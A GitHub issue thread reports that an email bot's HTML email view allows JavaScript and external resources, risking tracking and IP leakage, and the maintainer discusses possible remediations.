Unsafe content in HTML emails #59
Comments
|
Hi @dcRUSTy you are right here, I never bothered to take this into account as i thought the unique html link will be only available to the user and there are not user to user mail sending as one user would not even get the email id of any other user and this is done via bruteforce. Gimme sometime to see what is the best way would to fix/remediate this out. I will keep this issue open till then. |
|
Thinking out loud.. In addition to above. How about sending the HTML file as attachment in the bot, this way user has a copy of his email irrespective of service works in future or not, also the solves overhead of storing HTML file on server. |
|
But this wont fix the issue. JS file execution will still be there. Something else is needed. |
Describe the bug
JavaScript and external resources are allowed in "HTML version" of email which might lead to tracking and IP address leakage, and other wide range of security issues.
To Reproduce
Steps to reproduce the behavior:
Expected behavior
By default they should be blocked OR at least user should be given control.
Screenshots
The text was updated successfully, but these errors were encountered: